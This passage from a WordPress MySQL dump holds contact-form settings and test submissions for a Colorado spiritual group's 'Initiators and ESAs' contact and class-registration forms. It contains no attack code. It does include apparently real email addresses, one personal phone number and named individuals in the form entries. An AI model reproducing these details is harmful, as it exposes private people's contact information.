','unique_field_error',' '),(2374,61,'seq_num',NULL,'seq_num',NULL),(2375,61,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(2376,61,'changeDateErrorMsg','','changeDateErrorMsg',''),(2377,61,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(2378,61,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(2379,61,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(2380,61,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(2381,61,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(2382,61,'validateRequiredField','','validateRequiredField',''),(2383,61,'honeypotHoneypotError','','honeypotHoneypotError',''),(2384,61,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(2385,61,'drawerDisabled','','drawerDisabled',''),(2386,61,'repeatable_fieldsets','','repeatable_fieldsets',''),(2387,61,'unique_field','0','unique_field','0'),(2388,61,'allow_public_link','0','allow_public_link','0'),(2389,61,'embed_form','','embed_form',''),(2390,61,'form_title_heading_level','3','form_title_heading_level','3'),(2392,41,'form_title_heading_level','3','form_title_heading_level','3'),(2394,62,'editActive','1','editActive','1'),(2395,62,'date_updated','2017-07-04 17:38:36','date_updated','2017-07-04 17:38:36'),(2396,62,'clear_complete','1','clear_complete','1'),(2397,62,'hide_complete','1','hide_complete','1'),(2398,62,'show_title','0','show_title','0'),(2399,62,'status','','status',''),(2400,62,'append_page','','append_page',''),(2401,62,'ajax','0','ajax','0'),(2402,62,'logged_in','0','logged_in','0'),(2403,62,'not_logged_in_msg','','not_logged_in_msg',''),(2404,62,'sub_limit_number','','sub_limit_number',''),(2405,62,'sub_limit_msg','','sub_limit_msg',''),(2406,62,'title',' Loveland Initiators and ESAâs',NULL,NULL),(2407,62,'conditions','a:0:{}','conditions','a:0:{}'),(2408,62,'default_label_pos','above','default_label_pos','above'),(2409,62,'wrapper_class','','wrapper_class',''),(2410,62,'element_class','','element_class',''),(2411,62,'key','','key',''),(2412,62,'add_submit','1','add_submit','1'),(2413,62,'currency','','currency',''),(2414,62,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(2415,62,'calculations','a:0:{}','calculations','a:0:{}'),(2416,62,'formContentData','a:11:{i:0;s:8:\"html_141\";i:1;s:11:\"textbox_142\";i:2;s:12:\"lastname_143\";i:3;s:9:\"email_144\";i:4;s:9:\"phone_145\";i:5;s:14:\"listselect_146\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166666321\";i:7;s:12:\"textarea_150\";i:8;s:18:\"html_1663797373767\";i:9;s:10:\"submit_152\";i:10;s:18:\"html_1663797370980\";}','formContentData','a:11:{i:0;s:8:\"html_141\";i:1;s:11:\"textbox_142\";i:2;s:12:\"lastname_143\";i:3;s:9:\"email_144\";i:4;s:9:\"phone_145\";i:5;s:14:\"listselect_146\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166666321\";i:7;s:12:\"textarea_150\";i:8;s:18:\"html_1663797373767\";i:9;s:10:\"submit_152\";i:10;s:18:\"html_1663797370980\";}'),(2417,62,'created_at','2023-07-04 09:22:26','created_at','2023-07-04 09:22:26'),(2418,62,'seq_num',NULL,'seq_num',NULL),(2419,62,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(2420,62,'changeDateErrorMsg','','changeDateErrorMsg',''),(2421,62,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(2422,62,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(2423,62,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(2424,62,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(2425,62,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(2426,62,'validateRequiredField','','validateRequiredField',''),(2427,62,'honeypotHoneypotError','','honeypotHoneypotError',''),(2428,62,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(2429,62,'drawerDisabled','','drawerDisabled',''),(2430,62,'repeatable_fieldsets','','repeatable_fieldsets',''),(2431,62,'allow_public_link','0','allow_public_link','0'),(2432,62,'embed_form','','embed_form',''),(2433,62,'form_title_heading_level','3','form_title_heading_level','3'),(2434,62,'_seq_num','6','_seq_num','6'),(2435,63,'objectType','Form Setting','objectType','Form Setting'),(2436,63,'editActive','1','editActive','1'),(2437,63,'title','Event Registration',NULL,NULL),(2438,63,'created_at','2023-09-05 08:39:18','created_at','2023-09-05 08:39:18'),(2439,63,'form_title','Event Registration',NULL,NULL),(2440,63,'default_label_pos','above','default_label_pos','above'),(2441,63,'show_title','0','show_title','0'),(2442,63,'clear_complete','1','clear_complete','1'),(2443,63,'hide_complete','1','hide_complete','1'),(2444,63,'logged_in','0','logged_in','0'),(2445,63,'key','','key',''),(2446,63,'wrapper_class','','wrapper_class',''),(2447,63,'element_class','','element_class',''),(2448,63,'add_submit','0','add_submit','0'),(2449,63,'not_logged_in_msg','','not_logged_in_msg',''),(2450,63,'sub_limit_number','','sub_limit_number',''),(2451,63,'sub_limit_msg','<p><br></p>','sub_limit_msg','<p><br></p>'),(2452,63,'calculations','a:0:{}','calculations','a:0:{}'),(2453,63,'formContentData','a:14:{i:0;s:18:\"html_1632671894259\";i:1;s:16:\"hr_1639606449220\";i:2;s:40:\"satsang_class_registration_1632437126898\";i:3;s:108:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711\";i:4;s:107:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625\";i:5;s:107:\"less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837\";i:6;s:104:\"less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498\";i:7;s:4:\"hr_1\";i:8;s:56:\"eck_member_classes_available_for_2023-2024_1693928749137\";i:9;s:45:\"select_one_class_per_registrant_1658696832524\";i:10;s:48:\"enter_message_for_arahata_optional_1599679737041\";i:11;s:4:\"hr_2\";i:12;s:4:\"html\";i:13;s:8:\"register\";}','formContentData','a:14:{i:0;s:18:\"html_1632671894259\";i:1;s:16:\"hr_1639606449220\";i:2;s:40:\"satsang_class_registration_1632437126898\";i:3;s:108:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711\";i:4;s:107:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625\";i:5;s:107:\"less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837\";i:6;s:104:\"less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498\";i:7;s:4:\"hr_1\";i:8;s:56:\"eck_member_classes_available_for_2023-2024_1693928749137\";i:9;s:45:\"select_one_class_per_registrant_1658696832524\";i:10;s:48:\"enter_message_for_arahata_optional_1599679737041\";i:11;s:4:\"hr_2\";i:12;s:4:\"html\";i:13;s:8:\"register\";}'),(2454,63,'currency','','currency',''),(2455,63,'unique_field_error',' ','unique_field_error',' '),(2456,63,'seq_num',NULL,'seq_num',NULL),(2457,63,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(2458,63,'changeDateErrorMsg','','changeDateErrorMsg',''),(2459,63,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(2460,63,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(2461,63,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(2462,63,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(2463,63,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(2464,63,'validateRequiredField','','validateRequiredField',''),(2465,63,'honeypotHoneypotError','','honeypotHoneypotError',''),(2466,63,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(2467,63,'drawerDisabled','','drawerDisabled',''),(2468,63,'repeatable_fieldsets','','repeatable_fieldsets',''),(2469,63,'unique_field','0','unique_field','0'),(2470,63,'form_title_heading_level','3','form_title_heading_level','3'),(2471,63,'allow_public_link','0','allow_public_link','0'),(2472,63,'embed_form','','embed_form','');
/*!40000 ALTER TABLE `wpcl_nf3_form_meta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_nf3_form_meta` with 1875 row(s)
--

--
-- Table structure for table `wpcl_fluentform_entry_details`
--

DROP TABLE IF EXISTS `wpcl_fluentform_entry_details`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_fluentform_entry_details` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) unsigned DEFAULT NULL,
  `submission_id` bigint(20) unsigned DEFAULT NULL,
  `field_name` varchar(255) DEFAULT NULL,
  `sub_field_name` varchar(255) DEFAULT NULL,
  `field_value` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=350 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_fluentform_entry_details`
--

LOCK TABLES `wpcl_fluentform_entry_details` WRITE;
/*!40000 ALTER TABLE `wpcl_fluentform_entry_details` DISABLE KEYS */;
INSERT INTO `wpcl_fluentform_entry_details` VALUES (1,4,1,'names','first_name','Testing'),(2,4,1,'names','last_name','Testing'),(3,4,1,'email','','choll.03@comcast.net'),(4,4,1,'input_text','','555-555-5555'),(5,4,1,'input_radio','','Alamosa'),(6,4,1,'dropdown_1','','Initiator- Larry Dixon'),(7,4,1,'description','','This is a test message'),(8,4,2,'names','first_name','Test2'),(9,4,2,'names','last_name','Testing'),(10,4,2,'email','','choll.03@comcast.net'),(11,4,2,'input_text','','555-555-5555'),(12,4,2,'input_radio','','Boulder'),(13,4,2,'dropdown_2','','Initiator/Lisa Boston'),(14,4,2,'description','','Testing'),(15,4,3,'names','first_name','Test'),(16,4,3,'names','last_name','Testing'),(17,4,3,'email','','choll.03@comcast.net'),(18,4,3,'input_text','','555-555-5555'),(19,4,3,'input_radio','','Englewood'),(20,4,3,'dropdown_14','','ESA/Initiator-Rolf Mueller-Uri'),(21,4,3,'description','','This is a test.....'),(22,4,4,'names','first_name','Chad'),(23,4,4,'names','last_name','Tester'),(24,4,4,'email','','choll.03@comcast.net'),(25,4,4,'input_text','','555-555-5555'),(26,4,4,'input_radio','','Colorado Springs'),(27,4,4,'dropdown_5','','Initiator-Joan Riester'),(28,4,4,'description','','Yet another test!'),(29,4,5,'names','first_name','jOE'),(30,4,5,'names','last_name','tESTING'),(31,4,5,'email','','choll.03@comcast.net'),(32,4,5,'input_text','','555-555-5555'),(33,4,5,'input_radio','','Loveland'),(34,4,5,'dropdown_7','','Initiator-Marcie Tucker'),(35,4,5,'description','','This is a test with the new code'),(36,4,6,'names','first_name','Bill'),(37,4,6,'names','last_name','Tester'),(38,4,6,'email','','choll.03@comcast.net'),(39,4,6,'input_text','','555-555-5555'),(40,4,6,'input_radio','','Franktown'),(41,4,6,'dropdown_15','','ESA/Initiator-Kimberly Young'),(42,4,6,'description','','Trying new test with previous code'),(43,4,7,'names','first_name','Hal'),(44,4,7,'names','last_name','Tester'),(45,4,7,'email','','choll.03@comcast.net'),(46,4,7,'input_text','','555-555-5555'),(47,4,7,'input_radio','','Akron'),(48,4,7,'dropdown_1','','Initiator-Renee Wholey'),(49,4,7,'description','','Another test....'),(50,4,8,'names','first_name','Ted'),(51,4,8,'names','last_name','Tester'),(52,4,8,'email','','choll.03@comcast.net'),(53,4,8,'input_text','','555-555-5555'),(54,4,8,'input_radio','','Longmont'),(55,4,8,'dropdown_6','','Initiator-Vicki Cashman'),(56,4,8,'description','','This is a test'),(57,4,9,'names','first_name','Mick'),(58,4,9,'names','last_name','tESTER'),(59,4,9,'email','','choll.03@comcast.net'),(60,4,9,'input_text','','555-555-5555'),(61,4,9,'input_radio','','Louisville'),(62,4,9,'dropdown_16','','Initiator-Lisa Boston'),(63,4,9,'description','','This is another test.............'),(64,4,10,'names','first_name','Tad'),(65,4,10,'names','last_name','Tester'),(66,4,10,'email','','choll.03@comcast.net'),(67,4,10,'input_text','','555-555-5555'),(68,4,10,'input_radio','','Pagosa Springs'),(69,4,10,'dropdown_10','','Initiator-Lynnzie Sutton'),(70,4,10,'description','','New Test............'),(71,4,11,'names','first_name','Bob'),(72,4,11,'names','last_name','Testing'),(73,4,11,'email','','choll.03@comcast.net'),(74,4,11,'input_text','','555-555-5555'),(75,4,11,'input_radio','','Franktown'),(76,4,11,'dropdown_15','','ESA/Initiator-Kimberly Young'),(77,4,11,'description','','This is a test'),(78,4,12,'names','first_name','Robert'),(79,4,12,'names','last_name','Jazz'),(80,4,12,'email','','choll.03@comcast.net'),(81,4,12,'input_text','','555-555-5555'),(82,4,12,'input_radio','','Pagosa Springs'),(83,4,12,'dropdown_10','','Initiator-Lynnzie Sutton'),(84,4,12,'description','','Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'),(85,4,13,'names','first_name','Sam'),(86,4,13,'names','last_name','Tester'),(87,4,13,'email','','choll.03@comcast.net'),(88,4,13,'input_text','','555-555-5555'),(89,4,13,'input_radio','','Durango'),(90,4,13,'dropdown_20','','Initiator-Kathleen Neal'),(91,4,13,'description','','Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'),(92,4,14,'names','first_name','George'),(93,4,14,'names','last_name','Tester'),(94,4,14,'email','','choll.03@comcast.net'),(95,4,14,'input_text','','555-555-5555'),(96,4,14,'input_radio','','Centennial'),(97,4,14,'dropdown_13','','ESA/Initiator-Raelin Harp'),(98,4,14,'description','','Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'),(99,4,15,'names','first_name','Fred'),(100,4,15,'names','last_name','Tester'),(101,4,15,'email','','choll.03@comcast.net'),(102,4,15,'input_text','','555-555-5555'),(103,4,15,'input_radio','','Centennial'),(104,4,15,'dropdown_13','','ESA/Initiator-Raelin Harp'),(105,4,15,'description','','Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'),(106,4,16,'names','first_name','Brad'),(107,4,16,'names','last_name','Tester'),(108,4,16,'email','','choll.03@comcast.net'),(109,4,16,'input_text','','555-555-5555'),(110,4,16,'input_radio','','Alamosa'),(111,4,16,'dropdown_11','','Initiator- Larry Dixon'),(112,4,16,'description','','Testing'),(113,4,17,'names','first_name','Roger'),(114,4,17,'names','last_name','Testing'),(115,4,17,'email','','choll.03@comcast.net'),(116,4,17,'input_text','','555-555-5555'),(117,4,17,'input_radio','','Louisville'),(118,4,17,'dropdown_16','','ESA/Initiator-Tom Boston'),(119,4,17,'description','','Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'),(120,4,18,'names','first_name','Allen'),(121,4,18,'names','last_name','Testing'),(122,4,18,'email','','choll.03@comcast.net'),(123,4,18,'input_text','','555-555-5555'),(124,4,18,'input_radio','','Parker'),(125,4,18,'dropdown_8','','ESA/Initiator-Melony Mont-Eton'),(126,4,18,'description','','Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'),(127,4,19,'names','first_name','bill'),(128,4,19,'names','last_name','rogers'),(129,4,19,'email','','wmmrogers@comcast.net'),(130,4,19,'input_text','','303-919-7837'),(131,4,19,'input_radio','','Denver'),(132,4,19,'dropdown_3','','ESA/Initiator-Gordon Garland'),(133,4,19,'description','','this is a test'),(134,4,20,'names','first_name','Christie'),(135,4,20,'names','last_name','Gill'),(136,4,20,'email','','choll.03@comcast.net'),(137,4,20,'input_text','','555-555-5555'),(138,4,20,'input_radio','','Louisville'),(139,4,20,'dropdown_16','','Initiator-Lisa Boston'),(140,4,20,'description','','Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.');
/*!40000 ALTER TABLE `wpcl_fluentform_entry_details` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_fluentform_entry_details` with 140 row(s)
--

--
-- Table structure for table `wpcl_nf3_upgrades`
--

DROP TABLE IF EXISTS `wpcl_nf3_upgrades`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_nf3_upgrades` (
  `id` int(11) NOT NULL,
  `cache` longtext DEFAULT NULL,
  `stage` int(11) NOT NULL DEFAULT 0,
  `maintenance` bit(1) DEFAULT b'0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_nf3_upgrades`
--

LOCK TABLES `wpcl_nf3_upgrades` WRITE;
/*!40000 ALTER TABLE `wpcl_nf3_upgrades` DISABLE KEYS */;
INSERT INTO `wpcl_nf3_upgrades` VALUES (1,'a:4:{s:2:\"id\";i:1;s:6:\"fields\";a:4:{i:0;a:2:{s:2:\"id\";i:1;s:8:\"settings\";a:70:{s:5:\"label\";s:4:\"Name\";s:3:\"key\";s:4:\"name\";s:9:\"parent_id\";i:1;s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2019-07-15 13:38:56\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"1\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3277\";}}i:1;a:2:{s:2:\"id\";i:2;s:8:\"settings\";a:62:{s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:9:\"parent_id\";i:1;s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2019-07-15 13:38:56\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"2\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3281\";}}i:2;a:2:{s:2:\"id\";i:3;s:8:\"settings\";a:71:{s:5:\"label\";s:7:\"Message\";s:3:\"key\";s:7:\"message\";s:9:\"parent_id\";i:1;s:4:\"type\";s:8:\"textarea\";s:10:\"created_at\";s:19:\"2019-07-15 13:38:56\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"3\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:12:\"textarea_rte\";s:0:\"\";s:18:\"disable_rte_mobile\";s:0:\"\";s:14:\"textarea_media\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3284\";}}i:3;a:2:{s:2:\"id\";i:4;s:8:\"settings\";a:69:{s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:6:\"submit\";s:9:\"parent_id\";i:1;s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2019-07-15 